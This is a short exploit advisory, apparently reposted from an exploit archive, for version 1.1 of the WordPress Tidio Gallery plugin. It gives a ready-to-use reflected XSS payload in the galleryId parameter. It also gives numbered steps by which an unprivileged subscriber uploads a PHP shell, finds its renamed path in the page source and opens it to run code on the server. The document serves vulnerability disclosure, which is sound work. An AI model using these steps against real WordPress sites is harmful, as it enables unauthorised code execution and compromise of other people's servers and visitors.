WordPress Tidio Gallery plugin version 1.1 suffers from cross site scripting and remote shell upload vulnerabilities.
4cf61990f3046e00682cebed16ac681c320e26535c3b1ee57aec2aa0f1b6ff6e######################
# Exploit Title : Wordpress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.tidioelements.com/
# Software Link : http://downloads.wordpress.org/plugin/tidio-gallery.zip
# Date : 2014-07-14
# Tested on : Windows 7 / Mozilla Firefox
######################
# Location :
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php -> XSS
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-post.php -> Upload Shell
######################
# Vulnerablity n°1:
XSS Reflected Unauthenticated
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="/><script>alert(1);</script>
# Vulnerablity n°2:
Unprivileged user like subscriber could upload shell script.
The plugin rename file with "md5(microtime())" php functions.
1) Connect to url: http://VICTIM/wp-admin/admin-ajax.php?action=tidio_gallery_popup_insert_post
2) Click "add gallery" button
3) Click "edit" option
4) Click "add image" button
5) Click "upload" option and select php shell from local drive
6) Refresh page (ex. press F5 key)
7) View source page (ex. right-click -> view source page) and search string like this:
"fileUrl":"http://VICTIM/wp-content/uploads/2014/07/14625a7ca5df93c49910a502ef9aabfb.php"
Skip file with "*-thumb.php" extension.
8) Open browser and connect to http://VICTIM/wp-content/uploads/2014/07/14625a7ca5df93c49910a502ef9aabfb.php
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
#####################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed